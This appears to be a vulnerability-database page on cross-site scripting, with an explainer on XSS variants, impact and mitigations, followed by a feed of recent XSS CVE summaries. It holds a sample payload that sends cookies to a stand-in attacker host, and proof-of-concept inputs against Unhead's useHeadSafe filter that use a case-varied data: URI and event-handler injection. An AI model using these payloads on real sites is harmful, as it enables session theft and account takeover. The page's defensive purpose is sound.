Skip to main content

Cross-Site Scripting

web MEDIUM

Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.

How It Works

Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding. The attacker crafts input containing JavaScript code, which the application then incorporates into its HTML response. When a victim's browser renders this response, it executes the injected script as if it were legitimate code from the trusted website.

The attack manifests in three main variants. Reflected XSS occurs when malicious script arrives via an HTTP parameter (like a search query) and immediately bounces back in the response—typically delivered through phishing links. Stored XSS is more dangerous: the payload persists in the application's database (in comment fields, user profiles, forum posts) and executes whenever anyone views the infected content. DOM-based XSS happens entirely client-side when JavaScript code improperly handles user-controllable data, modifying the DOM in unsafe ways without ever sending the payload to the server.

A typical attack flow starts with the attacker identifying an injection point—anywhere user input appears in HTML output. They craft a payload like <script>document.location='http://attacker.com/steal?c='+document.cookie</script> and inject it through the vulnerable parameter. When victims access the page, their browsers execute this script within the security context of the legitimate domain, giving the attacker full access to cookies, session tokens, and DOM content.

Impact

  • Session hijacking: Steal authentication cookies to impersonate victims and access their accounts
  • Credential harvesting: Inject fake login forms on trusted pages to capture usernames and passwords
  • Account takeover: Perform state-changing actions (password changes, fund transfers) as the authenticated victim
  • Keylogging: Monitor and exfiltrate everything users type on the compromised page
  • Phishing and malware distribution: Redirect users to malicious sites or deliver drive-by downloads from a trusted domain
  • Data exfiltration: Access and steal sensitive information visible in the DOM or retrieved via AJAX requests

Real-World Examples

A stored XSS vulnerability in Twitter (2010) allowed attackers to create self-propagating worms. Users hovering over malicious tweets automatically retweeted them and followed the attacker, creating viral spread through the platform's legitimate functionality.

eBay suffered from persistent XSS flaws in product listings (CVE-2015-2880) where attackers embedded malicious scripts in item descriptions. Buyers viewing these listings had their sessions compromised, enabling unauthorized purchases and account takeover.

British Airways faced a sophisticated supply chain attack (2018) where attackers injected JavaScript into the airline's payment page. The script skimmed credit card details from 380,000 transactions, demonstrating how XSS enables payment fraud at massive scale.

Mitigation

  • Context-aware output encoding: HTML-encode for HTML context, JavaScript-encode for JS strings, URL-encode for URLs—never use generic escaping
  • Content Security Policy (CSP): Deploy strict CSP headers to whitelist script sources and block inline JavaScript execution
  • HTTPOnly and Secure cookie flags: Prevent JavaScript access to session cookies and ensure transmission over HTTPS only
  • Input validation: Reject unexpected characters and patterns, though this is defense-in-depth, not primary protection
  • DOM-based XSS prevention: Use safe APIs like textContent instead of innerHTML; avoid passing user data to dangerous sinks like eval()

Recent CVEs (38830)

EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Dataease 2.10.19 and earlier allows authenticated users to upload malicious SVG files that bypass backend validation by lacking proper sanitization of event handlers and script-capable attributes. An attacker can exploit this vulnerability to execute arbitrary JavaScript in victims' browsers when they access the uploaded static resource, achieving persistent code execution. The vulnerability was patched in version 2.10.20.

XSS Dataease
NVD GitHub VulDB
EPSS 0%
NONE PATCH Awaiting Data

The `link.href` check in `makeTagSafe` (safe.ts, line 68-71) uses `String.includes()`, which is case-sensitive: ```typescript if (key === 'href') { if (val.includes('javascript:') || val.includes('data:')) { return } next[key] = val } ``` Browsers treat URI schemes case-insensitively. `DATA:text/css,...` is the same as `data:text/css,...` to the browser, but `'DATA:...'.includes('data:')` returns `false`. ### PoC ```javascript useHeadSafe({ link: [{ rel: 'stylesheet', href: 'DATA:text/css,body{display:none}' }] }) ``` SSR output: ```html <link rel="stylesheet" href="DATA:text/css,body{display:none}"> ``` The browser loads this as a CSS stylesheet. An attacker can inject arbitrary CSS for UI redressing or data exfiltration via CSS attribute selectors with background-image callbacks. Any case variation works: `DATA:`, `Data:`, `dAtA:`, `JAVASCRIPT:`, etc. ## Suggested fix ```typescript if (key === 'href') { const lower = val.toLowerCase() if (lower.includes('javascript:') || lower.includes('data:')) { return } next[key] = val } ```

XSS Unhead
NVD GitHub
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

## Summary `useHeadSafe()` can be bypassed to inject arbitrary HTML attributes, including event handlers, into SSR-rendered `<head>` tags. This is the composable that Nuxt docs recommend for safely handling user-generated content. ## Details **XSS via `data-*` attribute name injection** The `acceptDataAttrs` function (safe.ts, line 16-20) allows any property key starting with `data-` through to the final HTML. It only checks the prefix, not whether the key contains spaces or other characters that break HTML attribute parsing. ```typescript function acceptDataAttrs(value: Record<string, string>) { return Object.fromEntries( Object.entries(value || {}).filter(([key]) => key === 'id' || key.startsWith('data-')), ) } ``` This result gets merged into every tag's props at line 114: ```typescript tag.props = { ...acceptDataAttrs(prev), ...next } ``` Then `propsToString` (propsToString.ts, line 26) interpolates property keys directly into the HTML string with no sanitization: ```typescript attrs += value === true ? ` ${key}` : ` ${key}="${encodeAttribute(value)}"` ``` A space in the key breaks out of the attribute name. Everything after the space becomes separate HTML attributes. ### PoC The most practical vector uses a `link` tag. `<link rel="stylesheet">` fires `onload` once the stylesheet loads, giving reliable script execution: ```javascript useHeadSafe({ link: [{ rel: 'stylesheet', href: '/valid-stylesheet.css', 'data-x onload=alert(document.domain) y': 'z' }] }) ``` SSR output: ```html <link data-x onload=alert(document.domain) y="z" rel="stylesheet" href="/valid-stylesheet.css"> ``` The browser parses `onload=alert(document.domain)` as its own attribute. Once the stylesheet loads, the handler fires. The same injection works on any tag type since `acceptDataAttrs` is applied to all of them at line 114. Here's the same thing on a `meta` tag (the injected attributes render, though `onclick` doesn't fire on non-interactive `<meta>` elements): ```javascript useHeadSafe({ meta: [{ name: 'description', content: 'legitimate content', 'data-x onclick=alert(document.domain) y': 'z' }] }) ``` ### Realistic scenario A Nuxt app accepts SEO metadata from a CMS or user profile. The developer uses `useHeadSafe()` as the docs recommend. An attacker puts a `data-*` key with spaces and an event handler into their input. The payload renders into the HTML on every page load. ## Suggested fix For vulnerability 1, validate that attribute names only contain characters legal in HTML attributes: ```typescript const SAFE_ATTR_RE = /^[a-zA-Z][a-zA-Z0-9\-]*$/ function acceptDataAttrs(value: Record<string, string>) { return Object.fromEntries( Object.entries(value || {}).filter( ([key]) => (key === 'id' || key.startsWith('data-')) && SAFE_ATTR_RE.test(key) ), ) } ```

XSS Unhead
NVD GitHub VulDB
EPSS 0% CVSS 8.1
HIGH This Week

Postal SMTP server versions below 3.3.5 contain a stored cross-site scripting (XSS) vulnerability in the admin interface where the API's "send/raw" method fails to properly escape user-supplied data, allowing authenticated attackers to inject malicious HTML and JavaScript. An attacker with API access could manipulate the admin dashboard or execute unauthorized actions in the context of an administrator's session. No patch is currently available for affected versions.

XSS
NVD GitHub
EPSS 0% CVSS 6.1
MEDIUM This Month

Unauthenticated attackers can inject malicious scripts into WordPress sites running the Simple Ajax Chat plugin (versions up to 20260217) through improper sanitization of the 'c' parameter, allowing arbitrary JavaScript execution in victim browsers. The vulnerability affects any user viewing an injected page and requires no user interaction beyond normal site access. No patch is currently available for this stored XSS vulnerability.

WordPress XSS
NVD VulDB
EPSS 0%
This Week

In Progress Flowmon ADS versions prior to 12.5.5 and 13.0.3, a vulnerability exists whereby an adversary with access to Flowmon monitoring ports may craft malicious network data that, when processed by Flowmon ADS and viewed by an authenticated user, could result in unintended actions being executed in the user's browser context.

XSS
NVD VulDB
EPSS 0%
This Week

This vulnerability allows attackers to trick administrators into performing unintended actions within Flowmon ADS by clicking malicious links while logged in. It affects Progress Flowmon ADS versions before 12.5.5 and 13.0.3. An attacker could exploit an administrator's authenticated session to make unauthorized changes to the system without the administrator's knowledge or consent.

XSS
NVD VulDB
EPSS 0% CVSS 2.1
LOW Monitor

Reflected cross-site scripting (XSS) in itsourcecode Payroll Management System 1.0 exists in the /manage_employee_deductions.php file via unsanitized ID parameters, allowing remote attackers to inject malicious scripts that execute in users' browsers. Public exploit code is available and the vulnerability remains unpatched. Successful exploitation requires user interaction but can lead to session hijacking, credential theft, or unauthorized payroll data manipulation.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 2.1
LOW Monitor

Stored cross-site scripting in CesiumJS up to version 1.137.0 allows unauthenticated remote attackers to inject malicious scripts through the parameter 'c' in Apps/Sandcastle/standalone.html, with public exploit code already available. While the vendor classifies this as demo code outside the core library product, the vulnerability affects users running vulnerable versions of the application. No patch is currently available.

XSS
NVD GitHub VulDB
EPSS 0% CVSS 2.0
LOW Monitor

A weakness has been identified in Campcodes Division Regional Athletic Meet Game Result Matrix System 2.1. This vulnerability affects unknown code of the file save_up_athlete.php. [CVSS 3.5 LOW]

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 2.0
LOW Monitor

A security flaw has been discovered in Campcodes Division Regional Athletic Meet Game Result Matrix System 2.1. This affects an unknown part of the file save-games.php. [CVSS 3.5 LOW]

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 4.3
MEDIUM This Month

The Reading progressbar WordPress plugin fails to properly clean user inputs in its settings, allowing administrators to inject malicious code that gets stored and executed when other users view the site. This affects WordPress installations using this plugin before version 1.3.1, particularly multisite setups. An admin-level attacker could execute arbitrary JavaScript in visitors' browsers to steal data or compromise accounts.

WordPress XSS
NVD WPScan VulDB
EPSS 0% CVSS 2.1
LOW Monitor

Cross-site scripting (XSS) in the /view_result.php endpoint of PHP-based University Management System 1.0 allows unauthenticated remote attackers to inject malicious scripts through the vr parameter. Public exploit code exists for this vulnerability, which requires user interaction to execute. The vulnerability has no available patch and affects the integrity of affected applications.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 2.1
LOW Monitor

Stored cross-site scripting (XSS) in Jcharis Machine-Learning-Web-Apps affects the Jinja2 template handler in Flask applications, allowing attackers to inject malicious scripts that execute in users' browsers. The vulnerability requires user interaction to trigger and can compromise data integrity through DOM manipulation. Public exploit code exists for this vulnerability, and the project maintainers have not yet released a patch.

XSS Python
NVD GitHub VulDB
EPSS 0% CVSS 7.6
HIGH This Week

Grafana Cubism Panel versions 0.1.2 and earlier contain a stored cross-site scripting (XSS) vulnerability where dashboard editors can inject malicious javascript: URIs into zoom-link handlers that execute with Grafana origin privileges when viewers interact with the panel. An authenticated attacker with editor permissions can craft a malicious dashboard that executes arbitrary JavaScript in the context of any user who zooms on the affected panel, potentially compromising sensitive data or session tokens.

Grafana XSS Grafanacubism Panel
NVD GitHub VulDB
EPSS 0% CVSS 3.7
LOW Monitor

HCL Nomad server on Domino did not configure the frame-ancestors directive in the Content-Security-Policy header by default which could allow an attacker to obtain sensitive information via unspecified vectors. [CVSS 3.7 LOW]

XSS
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored cross-site scripting in OpenEMR versions prior to 8.0.0.1 allows authenticated users with Track Anything feature access to inject malicious scripts into item names that execute in the browsers of all users viewing the corresponding Dygraph charts. An attacker with create or edit permissions can craft payloads that run in victims' sessions without their knowledge, potentially enabling session hijacking or unauthorized actions within the application. No patch is currently available for affected versions.

XSS Openemr
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored cross-site scripting (XSS) in OpenEMR prior to 8.0.0.1 allows administrators or users with code management privileges to inject malicious scripts into code descriptions that execute in the browsers of all users accessing the dynamic code picker. All OpenEMR instances running affected versions are at risk, as any authenticated admin can inject payloads affecting the entire user base. No patch is currently available for this vulnerability.

XSS Openemr
NVD GitHub VulDB
EPSS 0% CVSS 7.7
HIGH This Week

Stored DOM-based cross-site scripting (XSS) in OpenEMR prior to version 8.0.0.1 allows authenticated attackers with low privileges to inject malicious scripts through unsanitized patient names in the portal signing component, which are rendered client-side via jQuery. Successful exploitation requires user interaction and could enable attackers to perform actions in the context of affected users or steal sensitive health information. A patch is available in OpenEMR 8.0.0.1 and later versions.

PHP XSS Openemr
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in OpenEMR's Pain Map form prior to version 8.0.0.1 allows authenticated users to inject malicious JavaScript into encounter records that executes when other clinicians view the affected form. Since session cookies lack HttpOnly protection, attackers can hijack sessions of other users including administrators. This vulnerability requires user interaction and network access but poses significant risk in multi-user healthcare environments.

XSS Openemr
NVD GitHub VulDB
EPSS 0% CVSS 6.8
MEDIUM PATCH This Month

Medium severity vulnerability in Home Assistant MCP. #

Python XSS Home Assistant Mcp Server
NVD GitHub VulDB
EPSS 0% CVSS 3.7
LOW PATCH Monitor

If an attacker has been given both read- and write-permissions to the server, they can upload a malicious file with the filename `.prologue.html` and then craft a link to potentially execute arbitrary JavaScript in the victim's context. Note that it is intended behavior that the JavaScript would execute if the target clicks a link to the HTML file itself; "https://example.com/foo/.prologue.html". The vulnerability is that "https://example.com/foo/?b" would also evaluate the file, making the behavior unexpected. There are existing preventative measures (strict SameSite cookies) which makes it harder to leverage this vulnerability in an attack; in order to gain control of the target's authenticated session, the link must be clicked from a page served by the server itself -- most likely by editing an existing resource, which would require additional access permissions. Finally, for this attack to be successful, the attacker's target must click the specific crafted link given by the attacker. This vulnerability is not activated by normally browsing the web-UI on the server. ## Impact If successful, the malicious JavaScript could move or delete existing files on the server, or upload new files, using the account of the person who opens the link.

XSS Copyparty
NVD GitHub VulDB
EPSS 0% CVSS 2.1
LOW Monitor

Reflected cross-site scripting in LockerProject Locker versions 0.0.0 through 0.1.0 allows unauthenticated remote attackers to inject malicious scripts through the ID parameter in the Error Response Handler component. Public exploit code exists for this vulnerability, and the vendor has not yet provided a patch despite early notification.

XSS
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Plunk is an open-source email platform built on top of AWS SES. versions up to 0.7.1 is affected by cross-site scripting (xss) (CVSS 5.4).

XSS Plunk
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Frappe is a full-stack web application framework. versions up to 14.100.2 is affected by cross-site scripting (xss).

XSS Frappe
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Notesnook Mobile and Desktop versions prior to 3.3.9 allows authenticated users to execute arbitrary JavaScript by injecting malicious code into Twitter/X embed URLs through the editor component. An attacker with user account access can craft a malicious note containing a specially crafted embed URL that executes when the note is viewed, potentially compromising user data or session tokens. No patch is currently available for affected versions.

XSS Notesnook Mobile Notesnook Desktop
NVD GitHub VulDB
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Stored XSS in Parse Server prior to versions 9.6.0-alpha.4 and 8.6.30 allows unauthenticated attackers to upload files with dangerous extensions (such as .svgz, .xht, .xml) that bypass default upload filters and execute malicious scripts in users' browsers within the Parse Server domain. Successful exploitation enables attackers to steal session tokens, hijack user accounts, or perform unauthorized actions on behalf of victims. User interaction is required to trigger the vulnerability when victims access the uploaded malicious files.

Node.js XSS Parse Server
NVD GitHub VulDB
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Reflected XSS in Craft CMS versions before 5.9.7 and 4.17.3 allows remote attackers to execute arbitrary JavaScript in users' browsers via malicious return URLs that bypass insufficient sanitization. The vulnerability exists because the patch for a prior issue relied on strip_tags() to filter URLs, which fails to block dangerous URL schemes like javascript:. An attacker can craft a malicious link that, when clicked by an authenticated user, steals session cookies or performs actions on their behalf.

PHP XSS Craft Cms
NVD GitHub VulDB
EPSS 0% CVSS 6.5
MEDIUM This Month

web-based project management software. versions up to 17.2.0 is affected by cross-site scripting (xss) (CVSS 6.5).

XSS Openproject
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM This Month

Stored XSS via path traversal in Splunk Enterprise and Cloud Platform allows low-privileged users to inject malicious JavaScript into Views, compromising any user who visits the affected page. An attacker must socially engineer a victim into initiating the malicious request, but no special privileges or user interaction beyond initial page load is required. Affected versions include Splunk Enterprise below 10.2.0, 10.0.3, 9.4.9, and 9.3.9, with no patch currently available.

XSS Path Traversal Splunk +1
NVD VulDB
EPSS 0% CVSS 6.1
MEDIUM This Month

Unauthenticated attackers can inject malicious scripts into Cisco Unified CCX's web management interface due to insufficient input validation, enabling XSS attacks against administrators and users. Successful exploitation allows arbitrary JavaScript execution within the browser context or theft of sensitive session information. No patch is currently available.

Cisco XSS Unified Contact Center Express
NVD VulDB
EPSS 0% CVSS 6.1
MEDIUM This Month

Unauthenticated attackers can inject malicious scripts into the web management interfaces of multiple Cisco contact center products (Finesse, Packaged CCE, Unified CCE, Unified CCX, and Unified Intelligence Center) due to insufficient input validation. Successful exploitation allows arbitrary script execution in the victim's browser context, potentially enabling session hijacking or credential theft from administrators. No patch is currently available for this cross-site scripting vulnerability.

Cisco XSS
NVD VulDB
EPSS 0% CVSS 8.7
HIGH This Week

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 10.6 versions up to 18.7.6 is affected by cross-site scripting (xss) (CVSS 8.7).

Gitlab XSS
NVD VulDB
EPSS 0% CVSS 2.0
LOW Monitor

A vulnerability was detected in PHPEMS 11.0. The affected element is an unknown function of the file /index.php?ask=app-ask. [CVSS 3.5 LOW]

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 7.2
HIGH This Week

Unauthenticated attackers can inject malicious scripts into the Name Directory WordPress plugin (versions up to 1.32.1) through the 'name_directory_name' parameter, which are then executed in users' browsers when they visit affected pages. The vulnerability stems from inadequate input sanitization and output escaping, allowing stored cross-site scripting attacks that impact all unauthenticated visitors. No patch is currently available, though partial mitigations were attempted in versions 1.30.3 and 1.32.1.

WordPress XSS
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored XSS in Gravity Forms WordPress plugin through version 2.9.28.1 allows authenticated subscribers and above to inject malicious JavaScript via the form creation endpoint, which executes when administrators interact with the Form Switcher dropdown. The vulnerability stems from inadequate input sanitization and missing output escaping in the form title field. No patch is currently available.

WordPress XSS
NVD
EPSS 0% CVSS 7.2
HIGH This Week

for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom radio and checkboxgroup field values submitted versions up to 2.1.7. is affected by cross-site scripting (xss) (CVSS 7.2).

WordPress PHP XSS
NVD
EPSS 0% CVSS 7.2
HIGH This Week

The Responsive Contact Form Builder & Lead Generation Plugin for WordPress through version 2.0.1 fails to properly sanitize form field submissions, allowing unauthenticated attackers to inject malicious scripts that execute in the administrator dashboard when viewing lead entries. The vulnerability stems from incomplete input validation in the sanitization function combined with overly permissive output filtering that permits onclick attributes on links. Attackers can exploit this to steal admin credentials, modify site content, or perform arbitrary actions within WordPress.

WordPress XSS
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Authenticated contributors to WordPress sites running Happy Addons for Elementor up to version 3.21.0 can modify display conditions of published templates due to improper authorization checks in the `ha_condition_update` AJAX action and missing capability validation in `ha_get_current_condition`. The vulnerability allows attackers to alter template visibility rules and potentially inject unescaped content into HTML attributes, affecting site content delivery and potentially enabling stored XSS attacks.

WordPress XSS Authentication Bypass
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected XSS in the Organization Portal System's IFTOP module enables authenticated attackers to inject malicious JavaScript that executes in victims' browsers via social engineering or phishing links. This vulnerability requires user interaction to trigger and affects confidentiality and integrity with no current patch available.

XSS Organization Portal System
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored cross-site scripting in the Astra WordPress theme through versions 4.12.3 allows authenticated contributors and higher-privileged users to inject malicious scripts into post meta fields that execute when pages are viewed. The vulnerability stems from improper sanitization of background-related meta fields and missing output escaping in CSS property handling. Attackers with contributor-level access can compromise page content and redirect or manipulate user sessions.

WordPress XSS
NVD
EPSS 0% CVSS 2.0
LOW Monitor

Spin.js versions before 3.0.0 allow attackers to execute arbitrary JavaScript through a combination of prototype pollution and XSS in the spin() function, requiring user interaction via a crafted URL. An attacker can exploit this to manipulate Object.prototype and trigger malicious code execution in affected users' browsers. No patch is currently available.

XSS Spin Js
NVD GitHub VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored XSS in the weForms WordPress plugin allows authenticated users with Subscriber-level access to inject malicious scripts through REST API form submissions, bypassing the sanitization applied to frontend submissions. The vulnerability exists in versions up to 1.6.27 due to inconsistent input validation between the AJAX handler and REST API endpoint, enabling attackers to execute arbitrary JavaScript in the context of other users' browsers. No patch is currently available.

WordPress PHP XSS
NVD GitHub
EPSS 0% CVSS 7.1
HIGH This Week

DukaPress WordPress plugin versions up to 3.2.4 contain a reflected XSS vulnerability due to improper input sanitization and output encoding, allowing attackers to inject malicious scripts that execute in the browsers of high-privilege users like administrators. The vulnerability requires user interaction to exploit and can result in session hijacking, credential theft, or unauthorized administrative actions. No patch is currently available.

WordPress XSS
NVD WPScan
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored XSS in the WP ULike WordPress plugin up to version 5.0.1 allows authenticated users with Contributor access or higher to inject malicious scripts into pages through the shortcode template attribute, which executes when visitors view affected content. The vulnerability stems from improper use of html_entity_decode() that circumvents WordPress sanitization filters, requiring at least one like on a post to trigger payload execution. No patch is currently available.

WordPress XSS
NVD GitHub
EPSS 0% CVSS 8.1
HIGH This Week

Stored XSS in Adobe Commerce versions 2.4.9-alpha3 through 2.4.4-p16 allows high-privileged attackers to inject malicious scripts into form fields, which execute when victims visit the affected pages. Successful exploitation enables session hijacking and compromise of user confidentiality and integrity, though user interaction is required for the attack to succeed. No patch is currently available for this vulnerability.

Adobe XSS Commerce B2b +2
NVD
EPSS 0% CVSS 8.0
HIGH This Week

Stored XSS in Adobe Commerce versions 2.4.9-alpha3 through 2.4.4-p16 allows privileged attackers to inject malicious scripts into form fields that execute in victims' browsers, enabling session hijacking and credential theft. Exploitation requires user interaction and a high-privileged attacker account, but successful attacks compromise both confidentiality and integrity. No patch is currently available for affected versions.

Adobe XSS Commerce +2
NVD
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Commerce 2.4.4 through 2.4.9-alpha3 allows authenticated attackers with low privileges to inject malicious scripts into form fields that execute when victims view the affected pages. The vulnerability requires user interaction and could lead to session hijacking, credential theft, or malware distribution within Commerce environments. No patch is currently available for affected versions.

Adobe XSS Magento +2
NVD VulDB
EPSS 0% CVSS 4.8
MEDIUM This Month

Stored XSS in Adobe Commerce versions 2.4.9-alpha3 through 2.4.4-p16 allows high-privileged attackers to inject malicious scripts into form fields that execute when victims view the affected pages. The vulnerability requires attacker credentials and user interaction but could compromise session security and steal sensitive data across multiple Commerce deployments. No patch is currently available for affected versions.

Adobe XSS Magento +2
NVD VulDB
EPSS 0% CVSS 8.7
HIGH This Week

Stored XSS in Adobe Commerce and Magento versions 2.4.9-alpha3 through 2.4.4-p16 allows authenticated attackers to inject malicious scripts into form fields that execute in victims' browsers, enabling session hijacking and data theft. Exploitation requires user interaction when a victim visits a page containing the compromised field. No patch is currently available.

Adobe XSS Commerce +2
NVD VulDB
EPSS 0% CVSS 8.1
HIGH This Week

Stored XSS in Adobe Commerce versions 2.4.9-alpha3 through 2.4.4-p16 enables high-privileged attackers to inject malicious scripts into form fields, which execute in victim browsers during page visits. An attacker exploiting this vulnerability can achieve session hijacking and compromise both confidentiality and integrity, though successful exploitation requires user interaction and administrative privileges. No patch is currently available.

Adobe XSS Commerce +2
NVD VulDB
EPSS 0% CVSS 6.1
MEDIUM This Month

The RTMKit plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'themebuilder' parameter in all versions up to, and including, 1.6.8 due to insufficient input sanitization and output escaping. [CVSS 6.1 MEDIUM]

WordPress XSS
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Adobe Experience Manager 6.5.23 and earlier contain a stored XSS vulnerability in form fields that allows low-privileged authenticated users to inject malicious scripts. When victims access pages containing the injected payload, the JavaScript executes in their browser context, potentially leading to session hijacking, credential theft, or other client-side attacks. No patch is currently available for this vulnerability.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows low-privileged users to inject malicious scripts into form fields that execute when other users view the affected pages. An attacker can leverage this vulnerability to steal session tokens, credentials, or perform actions on behalf of victims within the AEM environment. No patch is currently available.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows low-privileged authenticated users to inject malicious scripts into form fields that execute in other users' browsers. An attacker with valid credentials can compromise other users' sessions and steal sensitive data by crafting specially crafted input. Currently no patch is available.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows low-privileged authenticated users to inject malicious scripts into form fields that execute in other users' browsers. An attacker with valid credentials could leverage this vulnerability to steal session tokens, modify page content, or perform actions on behalf of victims who view the compromised forms. No patch is currently available.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers to inject malicious scripts into form fields that execute in users' browsers when the page is viewed. An attacker with login credentials can craft payloads in vulnerable fields to steal session data or perform actions on behalf of victims. No patch is currently available.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers with low privileges to inject malicious scripts into form fields that execute in other users' browsers. An attacker can leverage this to steal session tokens, perform unauthorized actions, or redirect victims to malicious sites when they view compromised pages. No patch is currently available.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows low-privileged authenticated users to inject malicious scripts through form fields that execute in other users' browsers. An attacker with valid credentials can craft payloads to steal session tokens, redirect users, or perform actions on their behalf when victims view affected pages. No patch is currently available for this vulnerability.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Adobe Experience Manager 6.5.23 and earlier contain a stored XSS vulnerability in form fields that allows low-privileged authenticated users to inject malicious scripts executed in other users' browsers. An attacker can exploit this to steal credentials, perform unauthorized actions, or deface content when victims access affected pages. No patch is currently available.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers to inject malicious scripts into form fields that execute when other users view the affected pages. This requires low privileges and user interaction, enabling attackers to steal session data or perform actions on behalf of victims within the application context. No patch is currently available.

Adobe XSS
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers to inject malicious scripts into form fields that execute when other users view the affected pages. The vulnerability requires low privileges and user interaction, enabling attackers to steal session data or perform actions on behalf of victims. No patch is currently available.

Adobe XSS
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers to inject malicious scripts into form fields that execute when users view the compromised pages. The vulnerability requires low privileges and user interaction, enabling attackers to steal session data or perform actions on behalf of victims. No patch is currently available.

Adobe XSS
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers with low privileges to inject malicious scripts into form fields that execute when other users view the affected pages. An attacker can exploit this vulnerability to steal session tokens, perform unauthorized actions, or redirect users to malicious sites through script execution in victims' browsers. No patch is currently available.

Adobe XSS
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows low-privileged attackers to inject malicious scripts into form fields that execute when other users view the affected pages. An attacker with valid credentials can exploit this vulnerability to steal session tokens, perform actions on behalf of victims, or redirect users to malicious sites. No patch is currently available for this vulnerability.

Adobe XSS
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers with low privileges to inject malicious scripts into form fields that execute in other users' browsers. An attacker can exploit this vulnerability to perform actions on behalf of victims or steal sensitive information when they visit pages containing the compromised fields. No patch is currently available for this vulnerability.

Adobe XSS
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers with low privileges to inject malicious scripts into form fields that execute in victims' browsers. An attacker can exploit this vulnerability by injecting JavaScript that runs when other users access pages containing the compromised fields, potentially enabling session hijacking, credential theft, or malware distribution. No patch is currently available.

Adobe XSS
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows low-privileged authenticated users to inject malicious scripts into form fields that execute in other users' browsers. An attacker could exploit this to steal session tokens, redirect users, or perform actions on behalf of victims viewing affected pages. No patch is currently available.

Adobe XSS
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Adobe Experience Manager 6.5.23 and earlier contains a stored XSS vulnerability in form fields that allows low-privileged authenticated users to inject malicious scripts. When victims visit pages containing the injected payload, the attacker's JavaScript executes in their browser, potentially compromising user sessions or stealing sensitive data. No patch is currently available.

Adobe XSS
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers to inject malicious scripts into form fields that execute in other users' browsers. An attacker with low privileges can craft malicious input that persists in the application and compromises confidentiality and integrity for victims who access the affected pages. No patch is currently available.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows low-privileged authenticated users to inject malicious scripts into form fields that execute in victims' browsers when the contaminated pages are viewed. An attacker with valid credentials can exploit this to steal session tokens, credentials, or perform actions on behalf of affected users. No patch is currently available.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers to inject malicious scripts into form fields that execute when users view the affected pages. A low-privileged user can exploit this to perform actions in the context of other users' browsers, potentially compromising session integrity and enabling credential theft or data exfiltration. No patch is currently available.

